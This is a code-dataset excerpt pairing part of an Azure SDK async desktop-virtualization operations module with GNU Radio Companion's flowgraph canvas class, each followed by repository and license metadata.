header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Desktop', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops/{desktopName}'} # type: ignore
async def update(
self,
resource_group_name: str,
application_group_name: str,
desktop_name: str,
desktop: Optional["_models.DesktopPatch"] = None,
**kwargs: Any
) -> "_models.Desktop":
"""Update a desktop.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param application_group_name: The name of the application group.
:type application_group_name: str
:param desktop_name: The name of the desktop within the specified desktop group.
:type desktop_name: str
:param desktop: Object containing Desktop definitions.
:type desktop: ~desktop_virtualization_api_client.models.DesktopPatch
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Desktop, or the result of cls(response)
:rtype: ~desktop_virtualization_api_client.models.Desktop
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Desktop"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-03-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'applicationGroupName': self._serialize.url("application_group_name", application_group_name, 'str', max_length=64, min_length=3),
'desktopName': self._serialize.url("desktop_name", desktop_name, 'str', max_length=24, min_length=3),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if desktop is not None:
body_content = self._serialize.body(desktop, 'DesktopPatch')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Desktop', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops/{desktopName}'} # type: ignore
def list(
self,
resource_group_name: str,
application_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DesktopList"]:
"""List desktops.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param application_group_name: The name of the application group.
:type application_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DesktopList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~desktop_virtualization_api_client.models.DesktopList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DesktopList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-03-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'applicationGroupName': self._serialize.url("application_group_name", application_group_name, 'str', max_length=64, min_length=3),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DesktopList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops'} # type: ignore
|
Azure/azure-sdk-for-python
|
sdk/desktopvirtualization/azure-mgmt-desktopvirtualization/azure/mgmt/desktopvirtualization/aio/operations/_desktops_operations.py
|
Python
|
mit
| 12,575
|
"""
Copyright 2007-2011, 2016q Free Software Foundation, Inc.
This file is part of GNU Radio
SPDX-License-Identifier: GPL-2.0-or-later
"""
import ast
import functools
import random
from distutils.spawn import find_executable
from itertools import count
from gi.repository import GLib, Gtk
from . import colors
from .drawable import Drawable
from .connection import DummyConnection
from .. import Actions, Constants, Utils, Bars, Dialogs, MainWindow
from ..external_editor import ExternalEditor
from ...core import Messages
from ...core.FlowGraph import FlowGraph as CoreFlowgraph
class _ContextMenu(object):
"""
Help with drawing the right click context menu
"""
def __init__(self, main_window):
self._menu = Gtk.Menu.new_from_model(Bars.ContextMenu())
self._menu.attach_to_widget(main_window)
# In GTK 3.22 Menu.popup was deprecated, we want to popup at the
# pointer, so use that new function instead if we can.
if Gtk.check_version(3, 22, 0) is None:
self.popup = self._menu.popup_at_pointer
def popup(self, event):
self._menu.popup(None, None, None, None, event.button, event.time)
class FlowGraph(CoreFlowgraph, Drawable):
"""
FlowGraph is the data structure to store graphical signal blocks,
graphical inputs and outputs,
and the connections between inputs and outputs.
"""
def __init__(self, parent, **kwargs):
"""
FlowGraph constructor.
Create a list for signal blocks and connections. Connect mouse handlers.
"""
super(self.__class__, self).__init__(parent, **kwargs)
Drawable.__init__(self)
# We need to get the main window object so the context menu can be to the
# registered actions
app = Gtk.Application.get_default()
main_window = None
for window in app.get_windows():
if isinstance(window, MainWindow.MainWindow):
main_window = window
break
self.drawing_area = None
# important vars dealing with mouse event tracking
self.element_moved = False
self.mouse_pressed = False
self.press_coor = (0, 0)
# selected
self.selected_elements = set()
self._old_selected_port = None
self._new_selected_port = None
# current mouse hover element
self.element_under_mouse = None
# context menu
self._context_menu = _ContextMenu(main_window)
self.get_context_menu = lambda: self._context_menu
self._new_connection = None
self._elements_to_draw = []
self._external_updaters = {}
def _get_unique_id(self, base_id=''):
"""
Get a unique id starting with the base id.
Args:
base_id: the id starts with this and appends a count
Returns:
a unique id
"""
block_ids = set(b.name for b in self.blocks)
for index in count():
block_id = '{}_{}'.format(base_id, index)
if block_id not in block_ids:
break
return block_id
def install_external_editor(self, param, parent=None):
target = (param.parent_block.name, param.key)
if target in self._external_updaters:
editor = self._external_updaters[target]
else:
config = self.parent_platform.config
editor = (find_executable(config.editor) or
Dialogs.choose_editor(parent, config)) # todo: pass in parent
if not editor:
return
updater = functools.partial(
self.handle_external_editor_change, target=target)
editor = self._external_updaters[target] = ExternalEditor(
editor=editor,
name=target[0], value=param.get_value(),
callback=functools.partial(GLib.idle_add, updater)
)
editor.start()
try:
editor.open_editor()
except Exception as e:
# Problem launching the editor. Need to select a new editor.
Messages.send('>>> Error opening an external editor. Please select a different editor.\n')
# Reset the editor to force the user to select a new one.
self.parent_platform.config.editor = ''
def handle_external_editor_change(self, new_value, target):
try:
block_id, param_key = target
self.get_block(block_id).params[param_key].set_value(new_value)
except (IndexError, ValueError): # block no longer exists
self._external_updaters[target].stop()
del self._external_updaters[target]
return
Actions.EXTERNAL_UPDATE()
def add_new_block(self, key, coor=None):
"""
Add a block of the given key to this flow graph.
Args:
key: the block key
coor: an optional coordinate or None for random
"""
id = self._get_unique_id(key)
scroll_pane = self.drawing_area.get_parent().get_parent()
# calculate the position coordinate
h_adj = scroll_pane.get_hadjustment()
v_adj = scroll_pane.get_vadjustment()
if coor is None: coor = (
int(random.uniform(.25, .75)*h_adj.get_page_size() + h_adj.get_value()),
int(random.uniform(.25, .75)*v_adj.get_page_size() + v_adj.get_value()),
)
# get the new block
block = self.new_block(key)
block.coordinate = coor
block.params['id'].set_value(id)
Actions.ELEMENT_CREATE()
return id
def make_connection(self):
"""this selection and the last were ports, try to connect them"""
if self._new_connection and self._new_connection.has_real_sink:
self._old_selected_port = self._new_connection.source_port
self._new_selected_port = self._new_connection.sink_port
if self._old_selected_port and self._new_selected_port:
try:
self.connect(self._old_selected_port, self._new_selected_port)
Actions.ELEMENT_CREATE()
except Exception as e:
Messages.send_fail_connection(e)
self._old_selected_port = None
self._new_selected_port = None
return True
return False
def update(self):
"""
Call the top level rewrite and validate.
Call the top level create labels and shapes.
"""
self.rewrite()
self.validate()
self.update_elements_to_draw()
self.create_labels()
self.create_shapes()
def reload(self):
"""
Reload flow-graph (with updated blocks)
Args:
page: the page to reload (None means current)
Returns:
False if some error occurred during import
"""
success = False
data = self.export_data()
if data:
self.unselect()
success = self.import_data(data)
self.update()
return success
###########################################################################
# Copy Paste
###########################################################################
def copy_to_clipboard(self):
"""
Copy the selected blocks and connections into the clipboard.
Returns:
the clipboard
"""
#get selected blocks
blocks = list(self.selected_blocks())
if not blocks:
return None
#calc x and y min
x_min, y_min = blocks[0].coordinate
for block in blocks:
x, y = block.coordinate
x_min = min(x, x_min)
y_min = min(y, y_min)
#get connections between selected blocks
connections = list(filter(
lambda c: c.source_block in blocks and c.sink_block in blocks,
self.connections,
))
clipboard = (
(x_min, y_min),
[block.export_data() for block in blocks],
[connection.export_data() for connection in connections],
)
return clipboard
def paste_from_clipboard(self, clipboard):
"""
Paste the blocks and connections from the clipboard.
Args:
clipboard: the nested data of blocks, connections
"""
(x_min, y_min), blocks_n, connections_n = clipboard
# recalc the position
scroll_pane = self.drawing_area.get_parent().get_parent()
h_adj = scroll_pane.get_hadjustment()
v_adj = scroll_pane.get_vadjustment()
x_off = h_adj.get_value() - x_min + h_adj.get_page_size() / 4
y_off = v_adj.get_value() - y_min + v_adj.get_page_size() / 4
if len(self.get_elements()) <= 1:
x_off, y_off = 0, 0
# create blocks
pasted_blocks = {}
for block_n in blocks_n:
block_key = block_n.get('id')
if block_key == 'options':
continue
block_name = block_n.get('name')
# Verify whether a block with this name exists before adding it
if block_name in (blk.name for blk in self.blocks):
block_n = block_n.copy()
block_n['name'] = self._get_unique_id(block_name)
block = self.new_block(block_key)
if not block:
continue # unknown block was pasted (e.g. dummy block)
block.import_data(**block_n)
pasted_blocks[block_name] = block # that is before any rename
block.move((x_off, y_off))
while any(Utils.align_to_grid(block.coordinate) == Utils.align_to_grid(other.coordinate)
for other in self.blocks if other is not block):
block.move((Constants.CANVAS_GRID_SIZE, Constants.CANVAS_GRID_SIZE))
# shift all following blocks
x_off += Constants.CANVAS_GRID_SIZE
y_off += Constants.CANVAS_GRID_SIZE
self.selected_elements = set(pasted_blocks.values())
# update before creating connections
self.update()
# create connections
for src_block, src_port, dst_block, dst_port in connections_n:
source = pasted_blocks[src_block].get_source(src_port)
sink = pasted_blocks[dst_block].get_sink(dst_port)
connection = self.connect(source, sink)
self.selected_elements.add(connection)
###########################################################################
# Modify Selected
###########################################################################
def type_controller_modify_selected(self, direction):
"""
Change the registered type controller for the selected signal blocks.
Args:
direction: +1 or -1
Returns:
true for change
"""
return any([sb.type_controller_modify(direction) for sb in self.selected_blocks()])
def port_controller_modify_selected(self, direction):
"""
Change port controller for the selected signal blocks.
Args:
direction: +1 or -1
Returns:
true for changed
"""
return any([sb.port_controller_modify(direction) for sb in self.selected_blocks()])
def change_state_selected(self, new_state):
"""
Enable/disable the selected blocks.
Args:
new_state: a block state
Returns:
true if changed
"""
changed = False
for block in self.selected_blocks():
changed |= block.state != new_state
block.state = new_state
return changed
def move_selected(self, delta_coordinate):
"""
Move the element and by the change in coordinates.
Args:
delta_coordinate: the change in coordinates
"""
for selected_block in self.selected_blocks():
selected_block.move(delta_coordinate)
self.element_moved = True
def align_selected(self, calling_action=None):
"""
Align the selected blocks.
Args:
calling_action: the action initiating the alignment
Returns:
True if changed, otherwise False
"""
blocks = list(self.selected_blocks())
if calling_action is None or not blocks:
return False
# compute common boundary of selected objects
min_x, min_y = max_x, max_y = blocks[0].coordinate
for selected_block in blocks:
x, y = selected_block.coordinate
min_x, min_y = min(min_x, x), min(min_y, y)
x += selected_block.width
y += selected_block.height
max_x, max_y = max(max_x, x), max(max_y, y)
ctr_x, ctr_y = (max_x + min_x)/2, (max_y + min_y)/2
# align the blocks as requested
transform = {
Actions.BLOCK_VALIGN_TOP: lambda x, y, w, h: (x, min_y),
Actions.BLOCK_VALIGN_MIDDLE: lambda x, y, w, h: (x, ctr_y - h/2),
Actions.BLOCK_VALIGN_BOTTOM: lambda x, y, w, h: (x, max_y - h),
Actions.BLOCK_HALIGN_LEFT: lambda x, y, w, h: (min_x, y),
Actions.BLOCK_HALIGN_CENTER: lambda x, y, w, h: (ctr_x-w/2, y),
Actions.BLOCK_HALIGN_RIGHT: lambda x, y, w, h: (max_x - w, y),
}.get(calling_action, lambda *args: args)
for selected_block in blocks:
x, y = selected_block.coordinate
w, h = selected_block.width, selected_block.height
selected_block.coordinate = transform(x, y, w, h)
return True
def rotate_selected(self, rotation):
"""
Rotate the selected blocks by multiples of 90 degrees.
Args:
rotation: the rotation in degrees
Returns:
true if changed, otherwise false.
"""
if not any(self.selected_blocks()):
return False
#initialize min and max coordinates
min_x, min_y = max_x, max_y = self.selected_block.coordinate
# rotate each selected block, and find min/max coordinate
for selected_block in self.selected_blocks():
selected_block.rotate(rotation)
#update the min/max coordinate
x, y = selected_block.coordinate
min_x, min_y = min(min_x, x), min(min_y, y)
max_x, max_y = max(max_x, x), max(max_y, y)
#calculate center point of selected blocks
ctr_x, ctr_y = (max_x + min_x)/2, (max_y + min_y)/2
#rotate the blocks around the center point
for selected_block in self.selected_blocks():
x, y = selected_block.coordinate
x, y = Utils.get_rotated_coordinate((x - ctr_x, y - ctr_y), rotation)
selected_block.coordinate = (x + ctr_x, y + ctr_y)
return True
def remove_selected(self):
"""
Remove selected elements
Returns:
true if changed.
"""
changed = False
for selected_element in self.selected_elements:
self.remove_element(selected_element)
changed = True
return changed
def update_selected(self):
"""
Remove deleted elements from the selected elements list.
Update highlighting so only the selected are highlighted.
"""
selected_elements = self.selected_elements
elements = self.get_elements()
# remove deleted elements
for selected in list(selected_elements):
if selected in elements:
continue
selected_elements.remove(selected)
if self._old_selected_port and self._old_selected_port.parent not in elements:
self._old_selected_port = None
if self._new_selected_port and self._new_selected_port.parent not in elements:
self._new_selected_port = None
# update highlighting
for element in elements:
element.highlighted = element in selected_elements
###########################################################################
# Draw stuff
###########################################################################
def update_elements_to_draw(self):
hide_disabled_blocks = Actions.TOGGLE_HIDE_DISABLED_BLOCKS.get_active()
hide_variables = Actions.TOGGLE_HIDE_VARIABLES.get_active()
def draw_order(elem):
return elem.highlighted, elem.is_block, elem.enabled
elements = sorted(self.get_elements(), key=draw_order)
del self._elements_to_draw[:]
for element in elements:
if hide_disabled_blocks and not element.enabled:
continue # skip hidden disabled blocks and connections
if hide_variables and (element.is_variable or element.is_import):
continue # skip hidden disabled blocks and connections
self._elements_to_draw.append(element)
def create_labels(self, cr=None):
for element in self._elements_to_draw:
element.create_labels(cr)
def create_shapes(self):
#TODO - this is a workaround for bus ports not having a proper coordinate
# until the shape is drawn. The workaround is to draw blocks before connections
for element in filter(lambda x: x.is_block, self._elements_to_draw):
element.create_shapes()
for element in filter(lambda x: not x.is_block, self._elements_to_draw):
element.create_shapes()
def _drawables(self):
# todo: cache that
show_comments = Actions.TOGGLE_SHOW_BLOCK_COMMENTS.get_active()
hide_disabled_blocks = Actions.TOGGLE_HIDE_DISABLED_BLOCKS.get_active()
for element in self._elements_to_draw:
if element.is_block and show_comments and element.enabled:
yield element.draw_comment
if self._new_connection is not None:
yield self._new_connection.draw
for element in self._elements_to_draw:
if element not in self.selected_elements:
yield element.draw
for element in self.selected_elements:
if element.enabled or not hide_disabled_blocks:
yield element.draw
def draw(self, cr):
"""Draw blocks connections comment and select rectangle"""
for draw_element in self._drawables():
cr.save()
draw_element(cr)
cr.restore()
draw_multi_select_rectangle = (
self.mouse_pressed and
(not self.selected_elements or self.drawing_area.ctrl_mask) and
not self._new_connection
)
if draw_multi_select_rectangle:
x1, y1 = self.press_coor
x2, y2 = self.coordinate
x, y = int(min(x1, x2)), int(min(y1, y2))
w, h = int(abs(x1 - x2)), int(abs(y1 - y2))
cr.set_source_rgba(
colors.HIGHLIGHT_COLOR[0],
colors.HIGHLIGHT_COLOR[1],
colors.HIGHLIGHT_COLOR[2],
0.5,
)
cr.rectangle(x, y, w, h)
cr.fill()
cr.rectangle(x, y, w, h)
cr.stroke()
##########################################################################
# selection handling
##########################################################################
def update_selected_elements(self):
"""
Update the selected elements.
The update behavior depends on the state of the mouse button.
When the mouse button pressed the selection will change when
the control mask is set or the new selection is not in the current group.
When the mouse button is released the selection will change when
the mouse has moved and the control mask is set or the current group is empty.
Attempt to make a new connection if the old and ports are filled.
If the control mask is set, merge with the current elements.
"""
selected_elements = None
if self.mouse_pressed:
new_selections = self.what_is_selected(self.coordinate)
# update the selections if the new selection is not in the current selections
# allows us to move entire selected groups of elements
if not new_selections:
selected_elements = set()
elif self.drawing_area.ctrl_mask or self.selected_elements.isdisjoint(new_selections):
selected_elements = new_selections
if self._old_selected_port:
self._old_selected_port.force_show_label = False
self.create_shapes()
self.drawing_area.queue_draw()
elif self._new_selected_port:
self._new_selected_port.force_show_label = True
else: # called from a mouse release
if not self.element_moved and (not self.selected_elements or self.drawing_area.ctrl_mask) and not self._new_connection:
selected_elements = self.what_is_selected(self.coordinate, self.press_coor)
# this selection and the last were ports, try to connect them
if self.make_connection():
return
# update selected elements
if selected_elements is None:
return
# if ctrl, set the selected elements to the union - intersection of old and new
if self.drawing_area.ctrl_mask:
self.selected_elements ^= selected_elements
else:
self.selected_elements.clear()
self.selected_elements.update(selected_elements)
Actions.ELEMENT_SELECT()
def what_is_selected(self, coor, coor_m=None):
"""
What is selected?
At the given coordinate, return the elements found to be selected.
If coor_m is unspecified, return a list of only the first element found to be selected:
Iterate though the elements backwards since top elements are at the end of the list.
If an element is selected, place it at the end of the list so that is is drawn last,
and hence on top. Update the selected port information.
Args:
coor: the coordinate of the mouse click
coor_m: the coordinate for multi select
Returns:
the selected blocks and connections or an empty list
"""
selected_port = None
selected = set()
# check the elements
for element in reversed(self._elements_to_draw):
selected_element = element.what_is_selected(coor, coor_m)
if not selected_element:
continue
# update the selected port information
if selected_element.is_port:
if not coor_m:
selected_port = selected_element
selected_element = selected_element.parent_block
selected.add(selected_element)
if not coor_m:
break
if selected_port and selected_port.is_source:
selected.remove(selected_port.parent_block)
self._new_connection = DummyConnection(selected_port, coordinate=coor)
self.drawing_area.queue_draw()
# update selected ports
if selected_port is not self._new_selected_port:
self._old_selected_port = self._new_selected_port
self._new_selected_port = selected_port
return selected
def unselect(self):
"""
Set selected elements to an empty set.
"""
self.selected_elements.clear()
def select_all(self):
"""Select all blocks in the flow graph"""
self.selected_elements.clear()
self.selected_elements.update(self._elements_to_draw)
def selected_blocks(self):
"""
Get a group of selected blocks.
Returns:
sub set of blocks in this flow graph
"""
return (e for e in self.selected_elements if e.is_block)
@property
def selected_block(self):
"""
Get the selected block when a block or port is selected.
Returns:
a block or None
"""
return next(self.selected_blocks(), None)
def get_selected_elements(self):
"""
Get the group of selected elements.
Returns:
sub set of elements in this flow graph
"""
return self.selected_elements
def get_selected_element(self):
"""
Get the selected element.
Returns:
a block, port, or connection or None
"""
return next(iter(self.selected_elements), None)
##########################################################################
# Event Handlers
##########################################################################
def handle_mouse_context_press(self, coordinate, event):
"""
The context mouse button was pressed:
If no elements were selected, perform re-selection at this coordinate.
Then, show the context menu at the mouse click location.
"""
selections = self.what_is_selected(coordinate)
if not selections.intersection(self.selected_elements):
self.coordinate = coordinate
self.mouse_pressed = True
self.update_selected_elements()
self.mouse_pressed = False
if self._new_connection:
self._new_connection = None
self.drawing_area.queue_draw()
self._context_menu.popup(event)
def handle_mouse_selector_press(self, double_click, coordinate):
"""
The selector mouse button was pressed:
Find the selected element. Attempt a new connection if possible.
Open the block params window on a double click.
Update the selection state of the flow graph.
"""
self.press_coor = coordinate
self.coordinate = coordinate
self.mouse_pressed = True
if double_click:
self.unselect()
self.update_selected_elements()
if double_click and self.selected_block:
self.mouse_pressed = False
Actions.BLOCK_PARAM_MODIFY()
def handle_mouse_selector_release(self, coordinate):
"""
The selector mouse button was released:
Update the state, handle motion (dragging).
And update the selected flowgraph elements.
"""
self.coordinate = coordinate
self.mouse_pressed = False
if self.element_moved:
Actions.BLOCK_MOVE()
self.element_moved = False
self.update_selected_elements()
if self._new_connection:
self._new_connection = None
self.drawing_area.queue_draw()
def handle_mouse_motion(self, coordinate):
"""
The mouse has moved, respond to mouse dragging or notify elements
Move a selected element to the new coordinate.
Auto-scroll the scroll bars at the boundaries.
"""
# to perform a movement, the mouse must be pressed
# (no longer checking pending events via Gtk.events_pending() - always true in Windows)
redraw = False
if not self.mouse_pressed or self._new_connection:
redraw = self._handle_mouse_motion_move(coordinate)
if self.mouse_pressed:
redraw = redraw or self._handle_mouse_motion_drag(coordinate)
if redraw:
self.drawing_area.queue_draw()
def _handle_mouse_motion_move(self, coordinate):
# only continue if mouse-over stuff is enabled (just the auto-hide port label stuff for now)
redraw = False
for element in self._elements_to_draw:
over_element = element.what_is_selected(coordinate)
if not over_element:
continue
if over_element != self.element_under_mouse: # over sth new
if self.element_under_mouse:
redraw |= self.element_under_mouse.mouse_out() or False
self.element_under_mouse = over_element
redraw |= over_element.mouse_over() or False
break
else:
if self.element_under_mouse:
redraw |= self.element_under_mouse.mouse_out() or False
self.element_under_mouse = None
if not Actions.TOGGLE_AUTO_HIDE_PORT_LABELS.get_active():
return
if redraw:
# self.create_labels()
self.create_shapes()
return redraw
def _handle_mouse_motion_drag(self, coordinate):
redraw = False
# remove the connection if selected in drag event
if len(self.selected_elements) == 1 and self.get_selected_element().is_connection:
Actions.ELEMENT_DELETE()
redraw = True
if self._new_connection:
e = self.element_under_mouse
if e and e.is_port and e.is_sink:
self._new_connection.update(sink_port=self.element_under_mouse)
else:
self._new_connection.update(coordinate=coordinate, rotation=0)
return True
# move the selected elements and record the new coordinate
x, y = coordinate
if not self.drawing_area.ctrl_mask:
X, Y = self.coordinate
dX, dY = int(x - X), int(y - Y)
active = Actions.TOGGLE_SNAP_TO_GRID.get_active() or self.drawing_area.mod1_mask
if not active or abs(dX) >= Constants.CANVAS_GRID_SIZE or abs(dY) >= Constants.CANVAS_GRID_SIZE:
self.move_selected((dX, dY))
self.coordinate = (x, y)
redraw = True
return redraw
def get_extents(self):
show_comments = Actions.TOGGLE_SHOW_BLOCK_COMMENTS.get_active()
def sub_extents():
for element in self._elements_to_draw:
yield element.get_extents()
if element.is_block and show_comments and element.enabled:
yield element.get_extents_comment()
extent = 10000000, 10000000, 0, 0
cmps = (min, min, max, max)
for sub_extent in sub_extents():
extent = [cmp(xy, e_xy) for cmp, xy, e_xy in zip(cmps, extent, sub_extent)]
return tuple(extent)
|
mrjacobagilbert/gnuradio
|
grc/gui/canvas/flowgraph.py
|
Python
|
gpl-3.0
| 30,369
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.